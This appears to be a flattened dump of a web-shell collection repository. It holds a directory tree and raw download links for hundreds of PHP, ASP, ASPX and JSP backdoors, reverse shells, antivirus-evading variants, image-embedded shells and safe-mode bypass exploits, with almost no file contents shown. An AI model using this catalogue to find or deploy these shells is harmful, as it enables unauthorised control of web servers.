├── Php ├── c999shell.php ├── phpinfo.php ├── 中转bypass │ ├── 一句话.php │ └── 本地连接这个.php ├── 图片一句话 │ ├── JFIF.php │ ├── 404.jpg │ ├── 404.php │ ├── 图片马.jpg │ ├── gif89a.jpg │ └── gif89a.php ├── 529.php ├── Dx.php ├── NGH.php ├── cw.php ├── erne.php ├── kral.php ├── 上传马.php ├── 图片马.jpg ├── PHVayv.php ├── angel.php ├── fatal.php ├── gfs_sh.php ├── nshell.php ├── stres.php ├── tryag.php ├── CasuS 1.5.php ├── PH Vayv.php ├── PHANTASMA.php ├── PH_Vayv.php ├── SPS-3.0免杀.php ├── ex0shell.php ├── iMHaPFtp.php ├── license.zip ├── myshell.php ├── nsT View.php ├── rootshell.php ├── safe0ver.php ├── sosyete.php ├── Cyber Shell.php ├── Sincap 1.0.php ├── cybershell.php ├── load_shell.php ├── r57shell127.php ├── NTDaddy v1.9.php ├── PHPJackal v1.5.php ├── PHPRemoteView.php ├── aZRaiLPhp v1.0.php ├── aZRaiLPhp_v1.0.php ├── udf.dll 专用网马.php ├── www.zjjv.com.php ├── 仗剑孤行搜索可读可写目录脚本.php ├── CrystalShell v.1.php ├── KA_uShell 0.1.6.php ├── PhpSpy Ver 2006.php ├── SnIpEr_SA Shell.php ├── accept_language.php ├── Cyber Shell (v 1.0).php ├── EgY_SpIdEr ShElL V2.php ├── Loaderz WEB Shell.php ├── NetworkFileManagerPHP.php ├── s72 Shell v1.1 Coding.php ├── s72_Shell_v1.1_Coding.php ├── Shell [ci] .Biz was here.php ├── PHP-Shell-Detector-master.zip ├── Spider PHP Shell (SPS-3.0).php ├── KAdot Universal Shell v0.1.6.php ├── KAdot_Universal_Shell_v0.1.6.php ├── Silic Group php Webshell v3.php ├── GFS web-shell ver 3.1.7 - PRiV8.php ├── GFS_web-shell_ver_3.1.7_-_PRiV8.php ├── Antichat Shell. 
Modified by Go0o$E.php ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.php ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt ├── Adminer - Compact database management.php ├── Silic Group Hacker Army - BlackBap.Org.php ├── AK-74 Security Team Web Shell Beta Version.php ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.php ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php ├── blackbin │ ├── v1 │ │ ├── readme.md │ │ └── make2.php │ └── 404super.php ├── ZyklonShell.php ├── Uploader.php ├── simple-backdoor.php ├── simple_cmd.php ├── Simple_PHP_backdoor_by_DK.php ├── Non-alphanumeric.php ├── ru24_post_sh.php ├── wordpress backdoor.txt ├── README.md ├── pws.php ├── Uploading.php ├── pHpINJ.php ├── Worse Linux Shell.php ├── h4ntu shell [powered by tsoi].php ├── h4ntu_shell_[powered_by_tsoi].php ├── NCC-Shell.php ├── lamashell.php ├── bdshell.php ├── php-backdoor.php ├── Password Hasher for PHP Shell 2.1.php ├── ftpsearch.php ├── php-findsock-shell.php ├── matamu.php ├── WinX Shell.php ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php ├── SimShell 1.0 - Simorgh Security MGZ.php ├── SimShell_1.0_-_Simorgh_Security_MGZ.php ├── php-reverse-shell.php ├── Dive Shell 1.0 - Emperor Hacking Team.php ├── Dive_Shell_1.0_Emperor_Hacking_Team.php ├── hiddens shell v1.php └── backupsql.php ├── README.md ├── 一句话 ├── 合成图片马命令.txt ├── Asp_Aspx_Php_By_HUC.jpg └── Asp_Aspx_Php_ By_TNT.JPG ├── Cfm ├── devshell.md └── devshell.cfm ├── File include Bypass ├── includer.php ├── litteryixx.ASP ├── litteryi.txt └── includer.txt ├── Asp ├── DJ团队.asp ├── 上传小马.asp ├── 不灭之魂.asp ├── 小红帽.asp ├── 炽天使.asp ├── 目录扫描.asp ├── mssql.asp ├── radhat.asp ├── TNTHK加密小马.asp ├── Web Shell.asp ├── ZehirIV.asp ├── h4ck_Door.asp ├── 图片一句话 │ ├── img.asp │ ├── JFIF.asp │ ├── gif87a.asp │ └── gif89a.asp ├── 小强asp木马.asp ├── 目录扫描读写马.asp ├── 虚拟机主机提权大马.asp ├── 08小组内部交流专用.asp ├── 传说中的草泥马4.0.asp ├── 旁注 - 网站小助手.asp ├── 木马帮V1.1-火舌版.asp ├── 草莓webshell.asp ├── RedHat Hacker.asp ├── 
r00ts小组过防火墙马.asp ├── upfile_write.asp ├── Remote Explorer.asp ├── JspWebShell By 绝对零度.asp ├── STHx 渗透小组专用 ASP小马.asp ├── 红狼ASP木马--Anfly免杀版.asp ├── Aventis KlasVayv 1.0.asp ├── I.N.F HACKING CENTER.asp ├── KOA ASP类 WebShell扫描工具.asp ├── RedHat Hacker.asp明文版.asp ├── 80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp ├── RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp ├── Welcome To AK Team.asp └── CmdAsp.asp ├── Other ├── File include Bypass │ ├── includer.php │ ├── litteryixx.ASP │ ├── litteryi.txt │ └── includer.txt ├── acat │ ├── ACat.jar │ ├── ACat-src.zip │ ├── ACat-附数据库驱动.jar │ ├── ACat_jdk1.5.jar │ ├── ACat-附数据库驱动-jdk1.5.jar │ └── readme.md ├── Axis2Shell │ ├── config.aar │ ├── README.md │ └── Utils.java ├── jdk1.3webshell │ ├── test.ear │ ├── test.war │ └── readme.MD └── cat.aar │ ├── axis2 利用小工具cat.pdf │ ├── axis2 利用小工具cat.aar.zip │ └── Readme.md ├── Aspx ├── 国外牛逼大马.aspx ├── Code by Bin.aspx ├── ASPX小马 - 黑兵社团.aspx ├── 凝聚科技专用AspX大马 Bysunue.aspx ├── WebSniff 1.0 Powered by C.C.T.aspx ├── MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx ├── 上传马.aspx ├── ASPX one line Code Client by amxku.aspx ├── Command.aspx ├── SQL.aspx ├── fileupload.aspx └── Antak Webshell.aspx ├── Jsp ├── jspspy_k8.jsp ├── JFoler 1.0.jsp ├── Jsp反弹shell.txt ├── Silic Group.jsp ├── 园长-jsp │ ├── cat.jar │ ├── 使用说明.txt │ ├── cat.Jpg │ └── cat.jspx ├── Mysql Database.jsp ├── jshell ver 0.1.jsp ├── JspDo Code By Xiao.3.jsp ├── Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp ├── 新型JSP小马支持上传任意格式文件.jsp ├── 带回显执行cmd.jsp ├── 上传小马.jsp ├── Command Execution (win32).jsp ├── 小马.jsp ├── hahahaha小马.JSp ├── Oracle Database.jsp └── 一句话 │ └── caidao.jsp ├── Pl ├── Cgitelnet.pl └── GO.cgi.pl ├── 同时上传图片和马的上传利用页面.html ├── Nginx └── pwnginx-master.zip ├── ewebedtior编辑器本地构造上传漏洞利用代码.html ├── 构造的上传.html ├── FCKeditor编辑器本地构造的上传.html ├── asp.ashx ├── cmd.jsp ├── Mysql └── mysql_audit_plugin │ ├── README.md │ ├── audit_null.patch │ └── audit_null.c └── C# └── findsock.c /Php/c999shell.php: 
-------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/phpinfo.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/中转bypass/一句话.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/图片一句话/JFIF.php: -------------------------------------------------------------------------------- 1 | JFIF  2 | 3 | -------------------------------------------------------------------------------- /Asp/DJ团队.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/DJ团队.asp -------------------------------------------------------------------------------- /Asp/上传小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/上传小马.asp -------------------------------------------------------------------------------- /Asp/不灭之魂.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/不灭之魂.asp -------------------------------------------------------------------------------- /Asp/小红帽.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/小红帽.asp -------------------------------------------------------------------------------- /Asp/炽天使.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/炽天使.asp -------------------------------------------------------------------------------- /Asp/目录扫描.asp: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/目录扫描.asp -------------------------------------------------------------------------------- /Other/File include Bypass/includer.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/529.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/529.php -------------------------------------------------------------------------------- /Php/Dx.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Dx.php -------------------------------------------------------------------------------- /Php/NGH.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/NGH.php -------------------------------------------------------------------------------- /Php/cw.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/cw.php -------------------------------------------------------------------------------- /Php/erne.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/erne.php -------------------------------------------------------------------------------- /Php/kral.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/kral.php -------------------------------------------------------------------------------- /Php/上传马.php: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/上传马.php -------------------------------------------------------------------------------- /Php/图片马.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片马.jpg -------------------------------------------------------------------------------- /Asp/mssql.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/mssql.asp -------------------------------------------------------------------------------- /Asp/radhat.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/radhat.asp -------------------------------------------------------------------------------- /Php/PHVayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHVayv.php -------------------------------------------------------------------------------- /Php/angel.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/angel.php -------------------------------------------------------------------------------- /Php/fatal.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/fatal.php -------------------------------------------------------------------------------- /Php/gfs_sh.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/gfs_sh.php -------------------------------------------------------------------------------- 
/Php/nshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/nshell.php -------------------------------------------------------------------------------- /Php/stres.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/stres.php -------------------------------------------------------------------------------- /Php/tryag.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/tryag.php -------------------------------------------------------------------------------- /Asp/TNTHK加密小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/TNTHK加密小马.asp -------------------------------------------------------------------------------- /Asp/Web Shell.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/Web Shell.asp -------------------------------------------------------------------------------- /Asp/ZehirIV.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/ZehirIV.asp -------------------------------------------------------------------------------- /Asp/h4ck_Door.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/h4ck_Door.asp -------------------------------------------------------------------------------- /Asp/图片一句话/img.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/img.asp 
-------------------------------------------------------------------------------- /Asp/小强asp木马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/小强asp木马.asp -------------------------------------------------------------------------------- /Asp/目录扫描读写马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/目录扫描读写马.asp -------------------------------------------------------------------------------- /Asp/虚拟机主机提权大马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/虚拟机主机提权大马.asp -------------------------------------------------------------------------------- /Aspx/国外牛逼大马.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/国外牛逼大马.aspx -------------------------------------------------------------------------------- /Cfm/devshell.cfm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Cfm/devshell.cfm -------------------------------------------------------------------------------- /Jsp/jspspy_k8.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/jspspy_k8.jsp -------------------------------------------------------------------------------- /Php/CasuS 1.5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/CasuS 1.5.php -------------------------------------------------------------------------------- /Php/PH Vayv.php: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PH Vayv.php -------------------------------------------------------------------------------- /Php/PHANTASMA.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHANTASMA.php -------------------------------------------------------------------------------- /Php/PH_Vayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PH_Vayv.php -------------------------------------------------------------------------------- /Php/SPS-3.0免杀.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/SPS-3.0免杀.php -------------------------------------------------------------------------------- /Php/ex0shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/ex0shell.php -------------------------------------------------------------------------------- /Php/iMHaPFtp.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/iMHaPFtp.php -------------------------------------------------------------------------------- /Php/license.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/license.zip -------------------------------------------------------------------------------- /Php/myshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/myshell.php -------------------------------------------------------------------------------- /Php/nsT View.php: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/nsT View.php -------------------------------------------------------------------------------- /Php/rootshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/rootshell.php -------------------------------------------------------------------------------- /Php/safe0ver.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/safe0ver.php -------------------------------------------------------------------------------- /Php/sosyete.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/sosyete.php -------------------------------------------------------------------------------- /Php/图片一句话/404.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/404.jpg -------------------------------------------------------------------------------- /Php/图片一句话/404.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/404.php -------------------------------------------------------------------------------- /Php/图片一句话/图片马.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/图片马.jpg -------------------------------------------------------------------------------- /Pl/Cgitelnet.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Pl/Cgitelnet.pl 
-------------------------------------------------------------------------------- /Asp/08小组内部交流专用.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/08小组内部交流专用.asp -------------------------------------------------------------------------------- /Asp/传说中的草泥马4.0.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/传说中的草泥马4.0.asp -------------------------------------------------------------------------------- /Asp/图片一句话/JFIF.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/JFIF.asp -------------------------------------------------------------------------------- /Asp/旁注 - 网站小助手.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/旁注 - 网站小助手.asp -------------------------------------------------------------------------------- /Asp/木马帮V1.1-火舌版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/木马帮V1.1-火舌版.asp -------------------------------------------------------------------------------- /Asp/草莓webshell.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/草莓webshell.asp -------------------------------------------------------------------------------- /Jsp/JFoler 1.0.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/JFoler 1.0.jsp -------------------------------------------------------------------------------- /Jsp/Jsp反弹shell.txt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Jsp反弹shell.txt -------------------------------------------------------------------------------- /Jsp/Silic Group.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Silic Group.jsp -------------------------------------------------------------------------------- /Jsp/园长-jsp/cat.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/园长-jsp/cat.jar -------------------------------------------------------------------------------- /Jsp/园长-jsp/使用说明.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/园长-jsp/使用说明.txt -------------------------------------------------------------------------------- /Other/acat/ACat.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat.jar -------------------------------------------------------------------------------- /Php/Cyber Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Cyber Shell.php -------------------------------------------------------------------------------- /Php/Sincap 1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Sincap 1.0.php -------------------------------------------------------------------------------- /Php/cybershell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/cybershell.php 
-------------------------------------------------------------------------------- /Php/load_shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/load_shell.php -------------------------------------------------------------------------------- /Php/r57shell127.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/r57shell127.php -------------------------------------------------------------------------------- /Asp/RedHat Hacker.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/RedHat Hacker.asp -------------------------------------------------------------------------------- /Asp/r00ts小组过防火墙马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/r00ts小组过防火墙马.asp -------------------------------------------------------------------------------- /Asp/upfile_write.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/upfile_write.asp -------------------------------------------------------------------------------- /Asp/图片一句话/gif87a.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/gif87a.asp -------------------------------------------------------------------------------- /Asp/图片一句话/gif89a.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/图片一句话/gif89a.asp -------------------------------------------------------------------------------- /Aspx/Code by Bin.aspx: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/Code by Bin.aspx -------------------------------------------------------------------------------- /Jsp/Mysql Database.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Mysql Database.jsp -------------------------------------------------------------------------------- /Jsp/jshell ver 0.1.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/jshell ver 0.1.jsp -------------------------------------------------------------------------------- /Php/NTDaddy v1.9.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/NTDaddy v1.9.php -------------------------------------------------------------------------------- /Php/PHPJackal v1.5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHPJackal v1.5.php -------------------------------------------------------------------------------- /Php/PHPRemoteView.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHPRemoteView.php -------------------------------------------------------------------------------- /Php/aZRaiLPhp v1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/aZRaiLPhp v1.0.php -------------------------------------------------------------------------------- /Php/aZRaiLPhp_v1.0.php: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/aZRaiLPhp_v1.0.php -------------------------------------------------------------------------------- /Php/udf.dll 专用网马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/udf.dll 专用网马.php -------------------------------------------------------------------------------- /Php/www.zjjv.com.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/www.zjjv.com.php -------------------------------------------------------------------------------- /Php/仗剑孤行搜索可读可写目录脚本.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/仗剑孤行搜索可读可写目录脚本.php -------------------------------------------------------------------------------- /Php/图片一句话/gif89a.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/gif89a.jpg -------------------------------------------------------------------------------- /Php/图片一句话/gif89a.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/图片一句话/gif89a.php -------------------------------------------------------------------------------- /同时上传图片和马的上传利用页面.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/同时上传图片和马的上传利用页面.html -------------------------------------------------------------------------------- /Asp/Remote Explorer.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/Remote Explorer.asp 
-------------------------------------------------------------------------------- /Aspx/ASPX小马 - 黑兵社团.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/ASPX小马 - 黑兵社团.aspx -------------------------------------------------------------------------------- /Nginx/pwnginx-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Nginx/pwnginx-master.zip -------------------------------------------------------------------------------- /Other/acat/ACat-src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat-src.zip -------------------------------------------------------------------------------- /Php/CrystalShell v.1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/CrystalShell v.1.php -------------------------------------------------------------------------------- /Php/KA_uShell 0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/KA_uShell 0.1.6.php -------------------------------------------------------------------------------- /Php/PhpSpy Ver 2006.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PhpSpy Ver 2006.php -------------------------------------------------------------------------------- /Php/SnIpEr_SA Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/SnIpEr_SA Shell.php -------------------------------------------------------------------------------- 
/Php/accept_language.php: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /Php/中转bypass/本地连接这个.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/中转bypass/本地连接这个.php -------------------------------------------------------------------------------- /Asp/JspWebShell By 绝对零度.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/JspWebShell By 绝对零度.asp -------------------------------------------------------------------------------- /Asp/STHx 渗透小组专用 ASP小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/STHx 渗透小组专用 ASP小马.asp -------------------------------------------------------------------------------- /Asp/红狼ASP木马--Anfly免杀版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/红狼ASP木马--Anfly免杀版.asp -------------------------------------------------------------------------------- /Other/Axis2Shell/config.aar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/Axis2Shell/config.aar -------------------------------------------------------------------------------- /Other/acat/ACat-附数据库驱动.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat-附数据库驱动.jar -------------------------------------------------------------------------------- /Other/acat/ACat_jdk1.5.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat_jdk1.5.jar -------------------------------------------------------------------------------- /Php/Cyber Shell (v 1.0).php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Cyber Shell (v 1.0).php -------------------------------------------------------------------------------- /Php/EgY_SpIdEr ShElL V2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/EgY_SpIdEr ShElL V2.php -------------------------------------------------------------------------------- /Php/Loaderz WEB Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Loaderz WEB Shell.php -------------------------------------------------------------------------------- /一句话/Asp_Aspx_Php_By_HUC.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/一句话/Asp_Aspx_Php_By_HUC.jpg -------------------------------------------------------------------------------- /Asp/Aventis KlasVayv 1.0.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/Aventis KlasVayv 1.0.asp -------------------------------------------------------------------------------- /Asp/I.N.F HACKING CENTER.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/I.N.F HACKING CENTER.asp -------------------------------------------------------------------------------- /Asp/KOA ASP类 WebShell扫描工具.asp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/KOA ASP类 WebShell扫描工具.asp -------------------------------------------------------------------------------- /Asp/RedHat Hacker.asp明文版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/RedHat Hacker.asp明文版.asp -------------------------------------------------------------------------------- /Jsp/JspDo Code By Xiao.3.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/JspDo Code By Xiao.3.jsp -------------------------------------------------------------------------------- /Other/jdk1.3webshell/test.ear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/jdk1.3webshell/test.ear -------------------------------------------------------------------------------- /Other/jdk1.3webshell/test.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/jdk1.3webshell/test.war -------------------------------------------------------------------------------- /Php/NetworkFileManagerPHP.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/NetworkFileManagerPHP.php -------------------------------------------------------------------------------- /Php/s72 Shell v1.1 Coding.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/s72 Shell v1.1 Coding.php -------------------------------------------------------------------------------- /Php/s72_Shell_v1.1_Coding.php: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/s72_Shell_v1.1_Coding.php -------------------------------------------------------------------------------- /一句话/Asp_Aspx_Php_ By_TNT.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/一句话/Asp_Aspx_Php_ By_TNT.JPG -------------------------------------------------------------------------------- /Aspx/凝聚科技专用AspX大马 Bysunue.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/凝聚科技专用AspX大马 Bysunue.aspx -------------------------------------------------------------------------------- /File include Bypass/litteryi.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/File include Bypass/litteryi.txt -------------------------------------------------------------------------------- /Other/cat.aar/axis2 利用小工具cat.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/cat.aar/axis2 利用小工具cat.pdf -------------------------------------------------------------------------------- /Php/Shell [ci] .Biz was here.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Shell [ci] .Biz was here.php -------------------------------------------------------------------------------- 